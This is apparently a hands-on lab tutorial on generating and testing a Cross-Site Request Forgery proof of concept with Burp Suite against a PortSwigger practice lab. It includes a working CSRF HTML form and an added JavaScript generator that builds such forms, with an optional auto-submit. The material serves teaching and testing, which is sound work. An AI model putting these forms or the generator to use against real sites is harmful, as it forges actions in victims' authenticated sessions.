Introduction
In this lab, you will learn a fundamental technique in web application security testing: generating a Cross-Site Request Forgery (CSRF) Proof of Concept (PoC) using Burp Suite. CSRF is an attack that tricks a victim's browser into sending a request the victim did not intend, riding on the session cookie the browser already holds for the target site. Burp Suite Professional provides a feature that builds such a PoC automatically from a captured request, which can be used to demonstrate the vulnerability's impact.
You will use Burp Suite's proxy to intercept a request that changes the application's state (like updating an email address) and then use its "Engagement tools" to generate an HTML form that reproduces this request. This hands-on exercise will solidify your understanding of how CSRF attacks are crafted and tested.
Find a State-Changing Request (e.g., update email) in Proxy History
In this step, you will launch Burp Suite, use its built-in browser to perform an action on a target website, and then locate the corresponding request in the proxy history. A "state-changing request" is any request that modifies data on the server, such as changing a password, submitting a comment, or updating profile information.
First, let's start Burp Suite.
- Click on the Applications menu in the top-left corner of the screen.
- Go to Web and select Burp Suite Community Edition.
- A dialog box will appear. Keep the default settings (Temporary project) and click Next.
- On the next screen, select Use Burp defaults and click Start Burp.
Once Burp Suite is running, open its built-in browser.
- Go to the Proxy tab, and then the Intercept sub-tab. Make sure interception is off (the button reads "Intercept is off"), otherwise every request from the browser will pause in this tab instead of flowing straight into the HTTP history.
- Click the Open Browser button. A new Chromium browser window will open, pre-configured to proxy traffic through Burp Suite.
Now, let's perform an action to capture. For this lab, we will use a test website from PortSwigger.
- In the Burp browser, navigate to the following URL: https://portswigger.net/web-security/csrf/lab-no-defenses
- Click Access the lab. You will be redirected to a blog website.
- Log in to the application using the credentials wiener:peter. You can find these credentials in the lab description on the page.
- After logging in, you will see an "Update email" form. Enter a new email address, for example test@example.com, and click Update email.
Finally, let's find the request in Burp Suite.
- Go back to the Burp Suite window.
- Navigate to the Proxy tab and then the HTTP history sub-tab.
- Look through the list of requests. You should see a POST /my-account/change-email request. This is the state-changing request we want to target. Click on it to view its details in the panel below.
POST /my-account/change-email HTTP/2
Host: your-lab-id.web-security-academy.net
...
email=test%40example.com
You have now captured and identified a state-changing request. Note the form-encoded body (email=test%40example.com) and the Host header: these are the two pieces of information the PoC generator needs.
Right-Click the Request
In this step, you will use Burp Suite's context menu to access its advanced features. The context menu is a core part of the Burp Suite workflow, providing quick access to various tools that can be applied to a selected request.
With the POST /my-account/change-email request still highlighted in the Proxy > HTTP history tab, perform the following action:
- Move your mouse cursor over the selected request line.
- Right-click on the request.
This will open a large context menu with many options. This menu is context-sensitive, meaning the options available may change depending on where you click. By right-clicking on a request, you get a list of actions you can perform on that specific request, such as sending it to other Burp tools like Repeater, Intruder, or, in our case, the CSRF PoC generator.
Take a moment to look at the available options to familiarize yourself with the possibilities.
Go to Engagement tools > Generate CSRF PoC
In this step, you will navigate through the context menu to find and launch the CSRF PoC generator. This tool is categorized under "Engagement tools," which are features designed to help with demonstrating and reporting vulnerabilities. Be aware that Engagement tools, including Generate CSRF PoC, are only available in Burp Suite Professional; in Community Edition the sub-menu is absent, and you would have to write the equivalent HTML form (shown in the next step) by hand from the captured request.
After right-clicking the request in the previous step, the context menu is now visible. Follow these steps to generate the PoC:
- In the context menu, locate and hover your mouse over the Engagement tools option. This will reveal a sub-menu.
- From the sub-menu that appears, click on Generate CSRF PoC.
A new window titled "Generate CSRF PoC" will open. Burp Suite has automatically analyzed the POST request you selected and has generated a simple HTML page that, when submitted, will replay that same request. This is the core of a CSRF attack: tricking a user's browser into submitting a request to a website where they are already authenticated.
Review the Generated HTML Form
In this step, you will examine the HTML code generated by Burp Suite. Understanding this code is crucial to understanding how the CSRF attack works.
In the "Generate CSRF PoC" window, you will see a block of HTML code. It should look similar to the following:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>
history.pushState("", "", "/");
</script>
<form
action="https://your-lab-id.web-security-academy.net/my-account/change-email"
method="POST"
>
<input type="hidden" name="email" value="test@example.com" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Let's break down the key components of this HTML:
- <form action="..." method="POST">: This defines an HTML form. The action attribute specifies the URL where the form data will be sent, in this case the same endpoint used to change the email address. The method="POST" matches the original request's method.
- <input type="hidden" name="email" value="...">: This is a hidden form field. It contains the parameter required by the server to perform the action. Here it is the email parameter with the value test@example.com; Burp has URL-decoded the captured body (email=test%40example.com) because the browser will re-encode the field when the form is submitted. Because it is hidden, a victim visiting this page wouldn't see it.
- <input type="submit" value="Submit request" />: This creates the button that a victim would need to click to trigger the attack. In more advanced attacks, this submission can be triggered automatically using JavaScript.
- <script>history.pushState("", "", "/");</script>: This only rewrites the path shown in the address bar to "/" so the PoC file name is not visible to the victim; it has no effect on the request that is sent.
This simple HTML page is a functional Proof of Concept for the CSRF vulnerability.
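To make the generator's logic concrete, here is an added example (not code from the page or from Burp Suite) that re-implements what Generate CSRF PoC does for a captured request: parse the raw request as it appears in Proxy > HTTP history, URL-decode the form body (or the query string for a GET), and emit a page whose form replays the request. It goes slightly beyond the lab's case by also handling GET requests, refusing bodies that a plain HTML form cannot reproduce (for example JSON), and HTML-escaping parameter values so a captured value containing quotes cannot break out of the hidden input. Function names are hypothetical, and the sample request is constructed to mirror the lab's POST /my-account/change-email.

```javascript
// Added example, not the page's or Burp Suite's own code: a small
// re-implementation of "Generate CSRF PoC". Function names are hypothetical.

// Constructed sample request, shaped like the entry in Proxy > HTTP history.
// The cookie value is a placeholder, not a real session.
const SAMPLE_REQUEST = [
  "POST /my-account/change-email HTTP/2",
  "Host: your-lab-id.web-security-academy.net",
  "Cookie: session=REDACTED",
  "Content-Type: application/x-www-form-urlencoded",
  "",
  "email=test%40example.com",
].join("\r\n");

// Escape text for a double-quoted HTML attribute so a captured value such as
// "><script> cannot break out of the hidden input tag.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;");
}

// Split a raw request into request line, headers (lower-cased names) and body.
function parseRequest(raw) {
  const [head, ...rest] = raw.split(/\r?\n\r?\n/);
  const lines = head.split(/\r?\n/);
  const [method, target] = lines[0].split(" ");
  const headers = {};
  for (const line of lines.slice(1)) {
    const i = line.indexOf(":");
    if (i > 0) headers[line.slice(0, i).trim().toLowerCase()] = line.slice(i + 1).trim();
  }
  return { method: method.toUpperCase(), target, headers, body: rest.join("\n\n") };
}

// Decode application/x-www-form-urlencoded data into [name, value] pairs,
// the same decoding Burp applies before writing the hidden inputs.
function parseUrlEncoded(data) {
  const dec = (s) => decodeURIComponent(s.replace(/\+/g, " "));
  return data
    .split("&")
    .filter((p) => p.length > 0)
    .map((p) => {
      const i = p.indexOf("=");
      return i < 0 ? [dec(p), ""] : [dec(p.slice(0, i)), dec(p.slice(i + 1))];
    });
}

// Build the PoC page. autoSubmit adds the "advanced" variant that submits the
// form on load; history.pushState mirrors Burp's PoC and only hides the PoC
// file name in the address bar.
function generateCsrfPoc(raw, { autoSubmit = false } = {}) {
  const req = parseRequest(raw);
  const host = req.headers["host"];
  if (!host) throw new Error("request has no Host header");

  let params;
  let path = req.target;
  if (req.method === "GET") {
    const q = req.target.indexOf("?");
    params = q < 0 ? [] : parseUrlEncoded(req.target.slice(q + 1));
    if (q >= 0) path = req.target.slice(0, q);
  } else if (req.method === "POST") {
    const ct = (req.headers["content-type"] || "").toLowerCase();
    if (!ct.startsWith("application/x-www-form-urlencoded")) {
      throw new Error(`cannot replay a body of type "${ct}" with a plain HTML form`);
    }
    params = parseUrlEncoded(req.body.trim());
  } else {
    throw new Error(`HTML forms cannot send ${req.method} requests`);
  }

  const action = escapeHtml("https://" + host + path);
  const inputs = params
    .map(([n, v]) => `      <input type="hidden" name="${escapeHtml(n)}" value="${escapeHtml(v)}" />`)
    .join("\n");

  return [
    "<html>",
    "  <!-- CSRF PoC - added example generator -->",
    "  <body>",
    '    <script>history.pushState("", "", "/");</script>',
    `    <form action="${action}" method="${req.method}">`,
    inputs,
    '      <input type="submit" value="Submit request" />',
    "    </form>",
    autoSubmit ? "    <script>document.forms[0].submit();</script>" : "",
    "  </body>",
    "</html>",
  ].filter((line) => line !== "").join("\n");
}

console.log(generateCsrfPoc(SAMPLE_REQUEST));
```

Run it with Node and save the printed HTML to a file; opening that file in a browser that is logged in to the lab is the same experiment Burp's Test in browser performs. Requests with a JSON or multipart body, or with a custom header the server checks, need a different delivery (a fetch() call, which then runs into CORS), which is why the generator deliberately refuses them rather than producing a form that silently sends the wrong content type.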
Use the 'Test in browser' Feature to Verify the PoC
In this step, you will use the generated PoC to confirm the CSRF vulnerability. Burp Suite makes this easy with a built-in testing feature.
In the "Generate CSRF PoC" window, you will find a button labeled Test in browser. This feature allows you to test the PoC directly in the same browser session where you are authenticated to the target application.
- Click the Test in browser button.
- Burp Suite will give you a unique URL. Click the Copy button to copy this URL to your clipboard.
- Go back to Burp's built-in browser (the Chromium window).
- Paste the copied URL into the address bar and press Enter.
A new page will load, displaying only a "Submit request" button. This is your PoC in action.
- Click the Submit request button.
The browser will send the POST request to the web application. Since you are already logged in, your browser attaches the lab's session cookie and the application processes the request as if you made it legitimately. Two details make this a meaningful test: the PoC page is served by Burp itself, so the form is submitted from a different origin than the lab, exactly as an attacker's page would be; and the cookie is only attached because the lab does not restrict it. If the session cookie carried SameSite=Strict or SameSite=Lax, the browser would withhold it from a cross-site POST and the same PoC would fail, which is the first thing to check when a generated PoC does not work.
To confirm the attack was successful:
- Navigate back to the tab with the blog application.
- Refresh the page or click the "My account" link.
- You should see that the email has been updated to test@example.com (or whatever value was in your PoC). The lab should also display a "Congratulations, you solved the lab!" message.
This confirms that the CSRF PoC works and the application is vulnerable.
Summary
In this lab, you have successfully learned how to use Burp Suite to generate and test a Cross-Site Request Forgery (CSRF) Proof of Concept.
You practiced the complete workflow for this task:
- Capturing a state-changing request in Burp's proxy history.
- Using the context menu to access Engagement tools.
- Generating the CSRF PoC with a single click.
- Analyzing the resulting HTML to understand the attack mechanism.
- Testing the PoC in the browser to confirm the vulnerability.
This skill is essential for any web application security professional, as it provides a clear and effective way to demonstrate the real-world impact of a CSRF flaw to developers and stakeholders.
